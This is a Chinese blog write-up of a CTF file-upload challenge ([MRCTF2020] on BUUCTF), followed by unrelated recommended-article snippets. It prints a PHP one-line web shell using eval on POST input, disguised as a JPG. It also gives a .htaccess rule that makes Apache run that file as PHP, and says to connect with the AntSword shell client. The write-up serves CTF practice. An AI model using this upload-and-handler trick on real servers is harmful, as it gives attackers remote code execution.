[MRCTF2020]你传你呢

最新推荐文章于 2024-07-06 16:21:52 发布
最新推荐文章于 2024-07-06 16:21:52 发布
阅读量39 收藏
点赞数
分类专栏: CTF-web刷题 文章标签: php apache 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53689523/article/details/129403671
版权

题目分析

1.访问网址
在这里插入图片描述发现是文件上传漏洞
2.上传文件,发现上传jpg,.htaccess文件可以上传,所以知识点就是 htaccess重写攻击
先上传一张包含恶意代码的后缀名为.jpg的图片

<?php
    phpinfo();
    eval($_POST['cmd']);
    ?>

命名为shell.jpg,点击上传
在这里插入图片描述3.接着上传.htaccess文件

<FilesMatch "shell"> 
SetHandler application/x-httpd-php
</FilesMatch>

含义为:将名字中含有shell 的文件的文件格式设置为php
在这里插入图片描述4.接着用蚁剑 访问就行了
在这里插入图片描述PS:注意,显示的文件存储地址是绝对路径
/var/www/html/upload/607038eba0f98b2af7b90d0a937280c2/shell.jpg,一般apache的网页都在www某目录下。所以实际的路径为
http://1d2c2a21-0da5-4d83-b41a-509c0a6992de.node4.buuoj.cn:81/upload/607038eba0f98b2af7b90d0a937280c2/shell.jpg

MiaoA知识
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vigenere-cipher:Vigenere密码
03-19
它由重复26行/列的字母表组成,但是第一个字母被推到字母表的末尾,并且一直持续到z是第25行中的第一个字母为止。然后,程序将密钥用于行,将消息加密用于列。字母匹配,并显示加密的消息。标点和空格保持不变。
采区含断层工作面冲击失稳预测
04-19
本文以矿井西二采区某一工作面为工程背景,根据数值模拟峰前扰动时断层面应力、位移分叉趋势对断层冲击地压危险区域进行了初步划分,通过现场电磁辐射监测结果分析可知:预测的预警距离是工作面距断层35m时应当采取加强...
CTF 逆向练习-Transform
06-10
该资源配合博客使用,博客我还没写。 有空我会在哔哩哔哩录制教程。
向前欧拉法matlab代码-zbc-ops:我的GitHub个人资料的配置文件
05-20
向前欧拉法matlab代码 本周还是刷题,深入学习了winner攻击以及extend winner attack.然后就是做了几个有关造格子的题,没学很多,挺忙的。 直接从博客复制过来的,格式和markdown显示有点...选择不同的素数对,$l
实战某大型连锁企业域渗透
Ms08067安全实验室
07-04 945
点击星标,即时接收最新推文本文选自《内网安全攻防:红队之路》扫描二维码五折购书实战域渗透测试流程对黑客来说,拿下域控制器是终极目标。然而攻击者空间是如何通过采取信息收集、权限提升、横向移动等一系列手段,从而一步步拿下域控制器的呢?本次将从一张拓扑图开始,和大家一起梳理域的相关知识,并串联内网的各类攻击技术。实验环境概述 下图是一张某公司(虚构名:北京test公司)的网络拓扑示意图。该公司员工...
php header函数使用无效怎么解决
滴水石穿
07-03 157
如果使用PHP header函数时发生无效的情况,可能有几种可能的原因和解决方法: 1、确保在调用header函数之前没有输出任何内容。header函数必须在任何输出之前调用,包括HTML标记、空格、换行符等。 2、确保没有使用BOM(Byte Order Mark)标记。BOM是一种在UTF-8编码中用于标识文件开头的特殊字符序列,它会导致header函数无效。可以使用文本编辑器将文件另存为UTF-8无BOM格式。 注意:在某些情况下,BOM会导致PHP session无法正常工作,因为session数据
如何用Java写一个整理Java方法调用关系网络的程序
qq_42349895的博客
07-06 465
最近遇到了一个问题,大致是这样的:如果给你一个 java 方法,如何找到有哪些菜单在使用。我的第一想法是,这不很简单吗?!使用 IDEA 自带的右键 Find Usage 功能,一步一步往上溯源最终找到 Controller 中的方法,找到 requestMapping 的映射路径,然后去数据库一查便知。
Symfony实战手册:PHP框架的高级应用技巧
weixin_41859354的博客
07-02 440
Symfony框架的高级应用技巧涵盖了上述多个方面,通过深入理解和有效应用这些技术,开发人员可以构建出性能优异、安全可靠且易于维护的Web应用程序。继续学习和实践这些技术,将帮助开发人员在Symfony项目中取得更大的成功和成就。
30、PHP 实现 左旋转字符串、翻转单词顺序列
weixin_44010641的博客
07-06 89
后来才意识到,这家伙原来把句子单词的顺序翻转了,正确的句子应该是“I am a student.”。例如,字符序列S=”abcXYZdef”,要求输出循环左移3位后的结果,即“XYZdefabc”。对于一个给定的字符序列S,请你把其循环左移K位后的序列输出。同事Cat对Fish写的内容颇感兴趣,有一天他向Fish借来翻看,但却读不懂它的意思。公司最近来了一个新员工Fish,每天早晨总是会拿着一本英文杂志,写些句子在本子上。汇编语言中有一种移位指令叫做循环左移(ROL),现在有个简单的任务,
连锁店收银系统源码
QH15850290240的博客
07-04 932
千呼新零售2.0系统是零售行业连锁店一体化收银系统,包括线下收银+线上商城+连锁店管理+ERP管理+商品管理+供应商管理+会员营销等功能为一体,线上线下数据全部打通。后台管理网站: HTML5+vue2.0+element-ui+css+js。收银端: Dart3,框架:Flutter 3.19.6。核心开发语言: PHP、HTML5、Dart。小程序助手端: uniapp。小程序商城端: uniapp。后台接口: PHP7.3。
容器自动化:docker-compose
北京少女的梦
07-03 1193
ansible一键部署docker-compus+lnmp+lnmt项目 利用ansible 一键部署 docker compose+lnmp lnmt项目 包括环境安装 以及docker compose功能介绍
玄机——第四章 windows实战-wordpress wp
焦虑的焦虑
07-01 1982
第四章 windows实战-wordpress
【Symfony异步任务处理】掌握队列系统的高效之道
2401_85339615的博客
07-04 512
Symfony的队列系统允许你将耗时的任务放入队列中,然后由后台进程异步处理。Symfony的队列系统为处理耗时任务提供了一种高效、可靠的解决方案。本文详细介绍了如何在Symfony中实现队列处理,从配置到实际编码,再到性能优化和监控。希望本文能够帮助开发者深入理解Symfony的队列系统,并在项目中有效地使用它。本文深入探讨了Symfony队列系统的实现和应用,提供了详细的步骤和代码示例。通过本文的学习,读者将能够掌握Symfony队列系统的配置和使用,提升Web应用的性能和响应速度。
WordPress网站违法关键词字过滤插件下载text-filter
最新发布
科比不来it
07-06 97
WordPress网站违法关键词字过滤插件text-filter由本站原创开发,支持中英文关键字自动替换成**号,可以通过自定义保存修改按钮增加“预设关键字”,也可以导入定义好的txt文本形式的关键词。支持文章标题过滤,支持文章内容过滤,支持文章摘要过滤,支持文章评论过滤,支持中英文支持一键上文件格式为txt文本的敏感词库,多个关键词之间用英文逗号分隔。
thinkphp6/8 验证码
php菜鸟技术天地
07-03 169
如果不=2,在APP/middleware.php中,加上\think\middleware\SessionInit::class。打印dump(session_status());如果验证一直失败,看看Session是否开启,html和后台验证代码按官方来操作。这种全局开启,单独开启没搞。
掌握Laravel Passport:API认证的瑞士军刀
2402_85758349的博客
07-05 402
Laravel Passport是一个完整的OAuth2服务器实现,它允许你的应用通过访问令牌来安全地访问API。它提供了多种授权模式,包括客户端凭证、授权码、密码授权等。Laravel Passport是一个功能强大且灵活的API认证解决方案。它不仅支持多种授权模式,还提供了丰富的命令行工具来简化开发流程。通过本文的介绍和代码示例,你应该对如何在Laravel应用中使用Passport有了深入的理解。注意:实际开发中,你应该根据项目的具体需求和安全标准来配置和使用Passport。
GDP播放器 驱动视频播放器 PHP 系统源码 v4.4.3
荻酷网的博客
07-04 599
最重要的是我们自己开发了源代码,因此无论您在使用此工具时遇到什么问题,我们都会快速解决。分别支持PHP7.4/8.1/8.2三个版本。
wordpress:更新网站域名后后页面无法访问,页面媒体文件异常(已解决)
吻等离子的博客
07-03 77
WordPress 在数据库中存储了许多配置信息,包括网站的域名。如果更新了域名,但数据库中的旧域名没有更新,WordPress 将无法正确生成页面链接或重定向访问请求。
Laravel配置宝典:探索配置文件的深度使用
2401_85763803的博客
07-06 227
Laravel的配置文件存储在config目录下,每个功能模块都有自己的配置文件。你可以在config目录下创建自定义配置文件,或修改现有配置文件。return [使用config函数访问自定义配置项。
buuctf misc [MRCTF2020]ezmisc 1
05-16
这是一个关于MRCTF2020比赛的misc题目,题目名称为ezmisc 1。不知道你需要什么样的帮助,我可以给你一些关于此题的信息。 题目描述: There are some problems to solve! Each problem corresponds to a flag. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值